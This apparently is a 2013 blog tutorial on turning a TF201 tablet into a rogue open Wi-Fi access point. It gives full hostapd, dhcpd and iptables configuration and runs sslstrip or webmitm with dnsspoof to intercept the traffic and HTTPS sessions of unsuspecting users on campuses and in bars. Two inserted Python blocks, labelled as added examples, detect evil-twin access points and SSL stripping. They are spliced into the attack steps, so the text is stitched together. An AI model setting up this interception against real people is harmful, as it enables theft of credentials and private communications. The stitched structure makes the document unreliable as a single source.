Saturday, April 6, 2013

TF201 as sniffbox

the goal of this article:
turn your TF201 into a wifi "bridge"... and sniff all the data that passes through :)

here is my sample use:
on my campus we have 2 main wifi access points. one is protected with WPA-EAP, the other is OPEN but requires a valid login for surfing.

AP--------TF201------TARGETS

the first thing to do is building the kernel module for your 2nd wifi card ( mine is ath9k_htc ).
just download the kernel sources and mark your wifi dongle driver as <M> in menuconfig.

after this we have to update the kernel ( your changes may affect something else in the kernel ).
if you are using kernel_chooser, replace the kernel you booted from before ( mine was in /media/data/boot/zImage ). remember to make a backup first.

reboot.

if you plug in your wifi dongle after the boot process you should see its own modules loaded.
to check this, run "lsmod".

now we have 2 interfaces; we need some extra software to make our TF201 act like a router.
layman -a pentoo 
emerge -av --autounmask-write iptables dhcp dsniff hostapd sslstrip

i've emerged all this software fine. just unmask them.

now we have to configure them.
let's say that your client interface ( the one connected to the AP ) is wlan0 and the server interface ( the one where we will accept the targets' connections ) is wlan2.
we will always use the usb dongle as the server interface because the internal bcm4329 cannot operate in monitor mode.
in this example i will set the SSID of our dongle to "AndroidAP"; in real life i set it to the AP name ( AndroidAP works great too ;) )
/etc/hostapd/hostapd.conf:

ssid=AndroidAP
interface=wlan2
auth_algs=1
channel=7
driver=nl80211
hw_mode=g
logger_stdout=-1
logger_stdout_level=2
max_num_sta=5
macaddr_acl=0
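The hostapd.conf above makes the dongle advertise whatever SSID you pick, as an OPEN network on channel 7. From the other side of the fence, the cheapest way to notice such an AP is to keep an inventory of the authorized BSSIDs and the expected security for each managed SSID and compare it against what is on the air. The following is an added example, not code from the original post: it parses the text that `iw dev <iface> scan` prints and flags managed SSIDs served by an unknown BSSID or with weaker security than expected. SAMPLE_SCAN and INVENTORY are constructed sample data that imitate the `iw` output format; the inventory layout (SSID to BSSIDs plus expected security) is this example's own assumption.

```python
"""Evil-twin check over `iw dev <iface> scan` output (added example).

Not code from the original post. SAMPLE_SCAN and INVENTORY are constructed;
for a live check, pass the real output of `iw dev wlan0 scan` to audit_scan().
"""
import re
from dataclasses import dataclass, field


@dataclass
class Bss:
    bssid: str
    ssid: str = ""
    freq: int = 0                # MHz; 2442 is channel 7, as in the hostapd.conf above
    signal: float = 0.0          # dBm
    privacy: bool = False        # Privacy bit in the capability field
    rsn: bool = False            # RSN (WPA2) information element present
    wpa: bool = False            # WPA1 information element present
    akms: set = field(default_factory=set)   # authentication suites listed

    @property
    def security(self) -> str:
        """Collapse the IEs into one label comparable with the inventory."""
        if not (self.rsn or self.wpa):
            return "WEP" if self.privacy else "OPEN"
        generation = "WPA2" if self.rsn else "WPA"
        akm = "EAP" if any("802.1X" in a for a in self.akms) else "PSK"
        return f"{generation}-{akm}"


def parse_iw_scan(text):
    """Parse the text printed by `iw dev <iface> scan` into Bss records."""
    bss_list, cur = [], None
    for line in text.splitlines():
        m = re.match(r"BSS ([0-9a-fA-F:]{17})", line)
        if m:
            cur = Bss(bssid=m.group(1).lower())
            bss_list.append(cur)
            continue
        if cur is None:
            continue
        s = line.strip()
        if s.startswith("SSID: "):
            cur.ssid = s[len("SSID: "):]
        elif s.startswith("freq: "):
            cur.freq = int(float(s.split()[1]))
        elif s.startswith("signal: "):
            cur.signal = float(s.split()[1])
        elif s.startswith("capability: "):
            cur.privacy = "Privacy" in s
        elif s.startswith("RSN:"):
            cur.rsn = True
        elif s.startswith("WPA:"):
            cur.wpa = True
        elif s.startswith("* Authentication suites: "):
            cur.akms.add(s[len("* Authentication suites: "):])
    return bss_list


# Higher rank = stronger; used to detect an SSID being served with less than expected.
SECURITY_RANK = {"OPEN": 0, "WEP": 1, "WPA-PSK": 2, "WPA2-PSK": 3, "WPA-EAP": 4, "WPA2-EAP": 5}

# Constructed inventory (assumed layout): SSID -> authorized BSSIDs and expected security.
INVENTORY = {
    "CampusNet": {"bssids": {"00:11:22:aa:bb:01", "00:11:22:aa:bb:02"}, "security": "WPA2-EAP"},
    "CampusGuest": {"bssids": {"00:11:22:aa:bb:03"}, "security": "OPEN"},
}

# Constructed scan text in the style of `iw dev wlan0 scan`: one real CampusNet AP,
# one OPEN AP on channel 7 using the CampusNet name, and the guest network.
SAMPLE_SCAN = """\
BSS 00:11:22:aa:bb:01(on wlan0) -- associated
\tfreq: 2412
\tcapability: ESS Privacy (0x0411)
\tsignal: -52.00 dBm
\tSSID: CampusNet
\tRSN:\t * Version: 1
\t\t * Group cipher: CCMP
\t\t * Pairwise ciphers: CCMP
\t\t * Authentication suites: IEEE 802.1X
BSS 02:00:00:de:ad:01(on wlan0)
\tfreq: 2442
\tcapability: ESS (0x0401)
\tsignal: -30.00 dBm
\tSSID: CampusNet
BSS 00:11:22:aa:bb:03(on wlan0)
\tfreq: 2437
\tcapability: ESS (0x0401)
\tsignal: -60.00 dBm
\tSSID: CampusGuest
"""


def audit_scan(text, inventory=INVENTORY):
    """Return (bssid, ssid, reason) findings for managed SSIDs seen in the scan."""
    findings = []
    for bss in parse_iw_scan(text):
        expected = inventory.get(bss.ssid)
        if expected is None:
            continue  # SSIDs we do not manage are out of scope for this check
        if bss.bssid not in expected["bssids"]:
            findings.append((bss.bssid, bss.ssid, "BSSID not in inventory (possible evil twin)"))
        if SECURITY_RANK[bss.security] < SECURITY_RANK[expected["security"]]:
            findings.append((bss.bssid, bss.ssid,
                             f"weaker security than expected: {bss.security} vs {expected['security']}"))
    return findings


if __name__ == "__main__":
    for bssid, ssid, reason in audit_scan(SAMPLE_SCAN):
        print(f"{ssid} {bssid}: {reason}")
```

Running `iw dev wlan0 scan` needs root or CAP_NET_ADMIN. A BSSID can be spoofed as easily as an SSID, so a matching BSSID alone proves nothing; the security label is the more reliable tell, since a managed WPA-EAP network suddenly appearing OPEN is exactly the setup this article builds.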
/etc/dhcp/dhcpd.conf:

default-lease-time 600;
max-lease-time 7200;
option routers 192.168.50.1;
option domain-name-servers 192.168.50.1, 192.168.50.1;

subnet 192.168.50.0 netmask 255.255.255.0
{
    pool
    {
        max-lease-time 600;
        range 192.168.50.10 192.168.50.50;
        option routers 192.168.50.1;
        option domain-name-servers 192.168.50.1, 192.168.50.1;
        allow unknown-clients;
    }
}
let's start these 2 services:
/etc/init.d/hostapd start
/etc/init.d/dhcpd start
now we should see the AndroidAP open access point from our smartphone.
the first time you run dhcpd it yells at you because the server interface doesn't have an ip address assigned.
look at the dhcpd.conf file and find the ip following the "option routers" string.
in this example it is 192.168.50.1, so:
ifconfig wlan2 192.168.50.1
/etc/init.d/dhcpd start
now we have to forward packets from the server interface to the client one.
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
iptables -A FORWARD -i wlan0 -o wlan2 -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
iptables -A FORWARD -i wlan2 -o wlan0 -j ACCEPT
we now have 2 choices:

  1. use webmitm: this program uses a self-signed certificate. most common web browsers will show a warning about it, but if the user accepts, every SSL connection will be handled by us. the user thinks they are making a secure connection... and it's true... but with us :)
  2. use sslstrip: this program talks SSL with the remote hosts and serves all the results as unsecured web pages. it works only if the user starts the connection on port 80.
your choice depends on your environment. if you are on a university campus, with IT engineers around, most of them will be scared by an SSL warning. if you are in a public area like fast food places, bars and so on, most people will just press "Next" "I Agree" "OK" "let me surf!" :)
surely webmitm is the preferred choice since it also works on connections started over SSL. but remember that modern web browsers will show a big warning ( not IE lol )

if you choose sslstrip you have to redirect all packets sent to port 80 to port 10000.
port 10000 is the default for sslstrip; you can change it if you wish.
iptables -t nat -A PREROUTING -i wlan2 -p tcp --destination-port 80 -j REDIRECT --to-port 10000
now start sslstrip in another shell:
sslstrip
the last thing we have to set up is the domain name resolver for the targets.
in this case we will route all dns queries to mom google.
iptables -t nat -I PREROUTING -i wlan2 -p udp --destination-port 53 -j DNAT --to 8.8.8.8

Done!
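Both tricks above leave a symptom on the client side: sslstrip rewrites https:// links to http:// before the browser sees them, so the browser ends up making plaintext requests to hosts that are only ever served over HTTPS; dnsspoof (used in the webmitm variant below) answers every query with the box's own address, so many unrelated public names resolve to the same private address, the DHCP gateway. The following is an added example, not code from the original post, that checks for both over constructed records: HTTP requests as a local proxy would log them, and DNS answers as the resolver returned them. HTTPS_ONLY is a constructed stand-in for the browser's HSTS preload list, and the record layouts are this example's own assumptions.

```python
"""Client-side checks for SSL stripping and DNS spoofing (added example).

Not code from the original post. SAMPLE_REQUESTS and SAMPLE_ANSWERS are
constructed; a real run would take them from a local proxy log and from the
resolver. HTTPS_ONLY stands in for the browser's HSTS preload list.
"""
import ipaddress
from collections import defaultdict

# Constructed: hosts known to be served only over HTTPS (think HSTS preload).
HTTPS_ONLY = {"mail.example.com", "bank.example.net", "accounts.example.org"}
# Names under these suffixes legitimately resolve to private addresses.
LOCAL_SUFFIXES = (".lan", ".local", ".home", "localhost")


def find_stripped_requests(requests, https_only=HTTPS_ONLY):
    """Return (host, path) for plaintext requests to hosts that must be HTTPS.
    `requests` is an iterable of (scheme, host, path) tuples (assumed layout)."""
    return [(host, path) for scheme, host, path in requests
            if scheme.lower() == "http" and host.lower() in https_only]


def find_dns_hijack(answers, min_hosts=3):
    """Group answers by IP and report private addresses that several
    non-local names resolve to. `answers` is an iterable of (qname, ip)."""
    by_ip = defaultdict(set)
    for qname, ip in answers:
        name = qname.lower().rstrip(".")
        if name.endswith(LOCAL_SUFFIXES):
            continue
        if ipaddress.ip_address(ip).is_private:
            by_ip[ip].add(name)
    return {ip: sorted(names) for ip, names in by_ip.items() if len(names) >= min_hosts}


# Constructed proxy log: two hosts that should never be fetched in plaintext are.
SAMPLE_REQUESTS = [
    ("https", "bank.example.net", "/login"),
    ("http", "news.example.com", "/"),
    ("http", "mail.example.com", "/inbox"),
    ("http", "accounts.example.org", "/signin"),
]

# Constructed resolver answers: three public names all point at the 192.168.50.1
# gateway from the dhcpd.conf above, which is what a spoofing resolver produces.
SAMPLE_ANSWERS = [
    ("mail.example.com", "192.168.50.1"),
    ("bank.example.net", "192.168.50.1"),
    ("news.example.com", "192.168.50.1"),
    ("printer.lan", "192.168.50.20"),
    ("cdn.example.com", "203.0.113.10"),
]


if __name__ == "__main__":
    for host, path in find_stripped_requests(SAMPLE_REQUESTS):
        print(f"plaintext request to HTTPS-only host: http://{host}{path}")
    for ip, names in find_dns_hijack(SAMPLE_ANSWERS).items():
        print(f"{len(names)} public names resolve to private {ip}: {', '.join(names)}")
```

One caveat a practitioner will recognize: a captive portal, like the campus OPEN network mentioned at the top that requires a login, produces exactly the DNS symptom until you have authenticated, so the resolver check is only meaningful after login. The stripping check covers only hosts on the list, which is why HSTS and its preload list matter against sslstrip in the first place.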

if you choose webmitm we have to tell our targets that the whole internet is hosted on our TF201. launch in 2 separate shells:
webmitm
dnsspoof -i wlan2 

Done!

now you can sniff on the server interface :)
here is a gentoo-specific init script that does all this automatically: http://pastebin.com/6ZpQrJEj
